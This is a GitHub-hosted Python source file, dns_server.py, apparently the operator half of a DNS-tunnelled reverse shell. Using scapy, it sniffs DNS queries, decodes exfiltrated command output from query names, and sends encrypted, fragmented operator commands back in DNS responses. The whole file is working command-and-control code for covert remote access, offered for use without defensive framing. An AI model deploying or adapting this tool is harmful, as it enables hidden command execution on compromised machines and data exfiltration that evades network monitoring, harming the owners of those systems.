-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdns_server.py
181 lines (136 loc) · 4.52 KB
/
dns_server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
#!/usr/bin/env python3
from warnings import filterwarnings
filterwarnings("ignore")
from scapy.all import IP, UDP, DNS, DNSRR, send, sniff
from base64 import b64encode, b64decode
from Crypto.Cipher import AES
from urllib import request
import threading
import argparse
import zlib
import hashlib
import signal
import os
def ctrl_c_handler(signal, frame):
print("\nServer Stopped")
os._exit(0)
signal.signal(signal.SIGINT, ctrl_c_handler)
parser = argparse.ArgumentParser(description="DNS Reverse Shell Server")
parser.add_argument('domain', metavar='domain', type=str, help='Domain to connect to')
parser.add_argument('-i',
'--interface',
action='store',
type=str,
help='Interface to use',
default='eth0')
parser.add_argument('-k', '--key', action='store', type=str, help='Password to use', required=True)
parser.add_argument('-p',
'--ip',
action='store',
type=str,
help='Public IP of server',
default=request.urlopen('https://ipinfo.io/ip').read().decode())
args = parser.parse_args()
PUBLIC_IP = args.ip
IFACE = args.interface
DOMAIN = args.domain
KEY = hashlib.sha256(args.key.encode()).digest()
FRAG_LEN = 70 - len(DOMAIN)
lock = False
recv = b"" # Buffer of received data to process
queue = [] # List of commands to run
buf = [] # Break commands to send into smaller fragmented pieces
def reply(pkt, data=False) -> None:
global buf
# Construct the IP header
ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
# Consturct the UDP header
udp = UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)
# Check if data is pulse or not
if data is False:
data = pkt[DNS].qd.qname
# Mark as last packet
z = 0
if buf == []:
z = 1
# Construct the DNS header
dns = DNS(id=pkt[DNS].id,
qd=pkt[DNS].qd,
aa=1,
qr=1,
z=z,
an=DNSRR(rrname=data, type='A', ttl=600, rdata=PUBLIC_IP))
# Send the data
send(ip / udp / dns, iface=IFACE, verbose=False)
# Encrypt data
def encrypt(raw: bytes) -> bytes:
def _pad(s):
return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) %
AES.block_size).encode()
cipher = AES.new(KEY, AES.MODE_CBC)
return cipher.iv + cipher.encrypt(_pad(raw))
# Decrypt data
def decrypt(enc: bytes) -> bytes:
def _unpad(s):
return s[:-ord(s[len(s) - 1:])]
iv = enc[:AES.block_size]
cipher = AES.new(KEY, AES.MODE_CBC, iv)
return _unpad(cipher.decrypt(enc[AES.block_size:]))
# Encodes into base64 and fragments data into smaller pieces
def encode(data: bytes) -> list:
data = data.strip()
data = zlib.compress(data)
data = encrypt(data)
e_data = b64encode(data).decode()
frag_e_data = [e_data[i:i + FRAG_LEN] for i in range(0, len(e_data), FRAG_LEN)]
return frag_e_data
# Decode base64
def decode(data: bytes) -> str:
data = b64decode(data)
data = decrypt(data)
data = zlib.decompress(data)
return data.decode()
# Handle packets that come in
def pkt_callback(pkt) -> None:
global lock
global queue
global recv
global buf
# Extract data from client
data = pkt.qd.qname.split(f".{DOMAIN}".encode())[0]
# Check if is pulse or reply
if data != b"pulse":
recv += data
# Check if last packet
if pkt[DNS].z == 1:
try:
print(decode(recv))
except:
# UDP may lose data, oh wells...
print("Data got corrupted!")
finally:
lock = False
recv = b""
reply(pkt)
else:
# Fragment the commands to be sent if it's too long
if buf == [] and queue != []:
buf = encode(queue.pop(0))
if buf != []: # Check if there are any more commands left to send
reply(pkt, buf.pop(0) + f".{DOMAIN}")
else: # Continue with pulse
reply(pkt)
# Handle user input
def user_input():
global lock
while True:
if not lock:
queue.append(input("> ").encode())
lock = True
def main():
print("Server started!")
threading.Thread(target=user_input).start()
# Sniff dns packets
sniff(iface=IFACE, prn=pkt_callback, filter="udp dst port 53 and udp[10] & 0x80 = 0", store=0)
if __name__ == "__main__":
main()